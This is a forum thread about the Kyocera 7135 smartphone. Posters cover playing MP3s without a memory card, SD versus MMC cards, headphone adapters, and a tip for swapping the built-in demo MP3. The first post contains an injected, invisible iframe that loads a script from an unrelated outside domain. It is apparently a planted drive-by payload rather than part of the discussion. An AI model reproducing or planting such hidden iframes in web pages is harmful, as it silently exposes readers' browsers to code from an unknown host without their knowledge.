+ Reply to Thread

Can an MP3 be downloaded without a card?

Just ordered a 256 Lexar from Buy.com but prob won't be here until next week. I wanted to download one MP3 to see how it sounded before the card came. Is this possible without the SD card?

Also, I don't like earbuds and was trying to find an adapter to work with my portable CD player Stereo headphones. Radio Shack didn't have one. Anyone know if they are available anywhere?

I saw someone on this site was selling adapters but I don't want to pay $20<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You need the card to play MP3s. Go buy a cheap MMC card if you want to try it out. The 7135 uses a special plug setup for the headset, I don't think there are any available except for the guy on here making custom ones. I doubt he's making a fortune on the things. From what I've read, people are pretty happy with what he makes.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Re: mp3 card

Thx Nick. So why do I need the "Secure" digtal card. What's so secure about it, what's the diff? Wouldn't I be better off with the cheap MMC card for MP3 and 7135 file back up and save the difference and put it towards the upcoming San Disk card that is expected to allow the 7135 to access the internet over a wireless network without using the phones minutes?

I don't think the security on SD cards is for your benefit. It seems to be for protecting copyrighted material. It may be geared more towards protecting publishers and music companies. The SD cards are supposed to be faster and MMC cards quit increasing in capacity. The SD card is thicker and also has a lock slider so you can protect it from being erased accidentally. I too am interested in seeing what the combo memory/wireless network card is like and what it can do. I have a wireless network at home.

Here is a story on SD vs. MMC cards

http://asia.cnet.com/reviews/handhel...9008492,00.htm
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Informative SD vs MMC review

Great review Nick
    $47 for the SD with rebate was a great price, so I'll leave that order in but I'll do as you suggest and pick up a cheap MMC card as a xtra card to get started with right now. I also have a multi card reader from my digital camera to speed up transfers to either card.
    At least something I own can be used along with the 7135.
    I'm still smarting from my cash out lay from the 6035 and almost all of them are useless with the 7135.

Originally posted by tmwebsites
    The 7135 uses a special plug setup for the headset, I don't think there are any available except for the guy on here making custom ones. I doubt he's making a fortune on the things. From what I've read, people are pretty happy with what he makes.
    Yep... I've heard nothing but good things about coolcat's adapters. And the price is reasonable (especially considering that you can't just go out and buy one anywhere). I plan to order one soon

p.s. While you're waiting for your card you can go, in the MP3 player, to options, about MP3 player, and listen to the demo MP3.
    Please visit my picture site: Robert-O-Rama :)

Thx Robert for Demo mp3 info . .

That's just the info I was looking for in one of my earlier post. I looked everywhere for an MP3 demo that might have come with the 7135 or the CD. For $500 clams they could have included a 16mb MMC card and the $14 headphones very poor MARKETING on Kyocera's part and who would have thought they would have hidden the demo in "about".
    By the way in my previous post I meant to say "I'm still smarting from my cash outlay of the "accessories" for the 6035 most of which won't work with now with the 7135. I paid full price at the Kyocera website 2 years ago, like most of us. Only my data cable from the 6035 works with the 7135, but it's serial and I need USB connectivity on my Vaio lap tops which without the docking station attached have no serial connectors.
    Nice to have Dan's cell phones to buy from now.
    Figure I'll get the USB, an xtra cradle for my office and the cig adapter. I'll probably get the earbuds and have coolcat convert them over to the over to the over the ear sony setup (earbuds never stay in my shallow type ears).

But now that you've given me the ability to hear the MP3 demo before my card gets here (can't buy a cheap MMC card today as it's easter and everything is closed).
    Now how can I hear the demo in Stereo . . . I have plenty of headsets from other devices, but now no way to convert them to adapt to the smaller 7135 plug . . . Think Cool Cat will make a house call and drop me off an adapter? This "is an emergency" . . . Have my new 7135 all dressed up and ready to go and play the demo mp3 and now no way to hear it in over stereo headphones :anger

Re: Can an MP3 be downloaded without a card?

Originally posted by Expidia
    Just ordered a 256 Lexar from Buy.com but prob won't be here until next week. I wanted to download one MP3 to see how it sounded before the card came. Is this possible without the SD card?
    YES. Name your mp3 file: LIGHTSSOLO.mp3 and then convert it with the Mp3Maker program using the "DEMO" setting. Sync it to your 7135 and it will replace the default "DEMO" found in the MP3 Player's "About" screen. You may want to Soft-Reset the phone (I reccomend twice) so the new file is definatley recognized. The original dem is a ROM file so just delete your custom Demo, soft-reset and your back to OEM.

Good luck and have fun!
    iPhone therefore iAm.

Thanks, I'll try that out!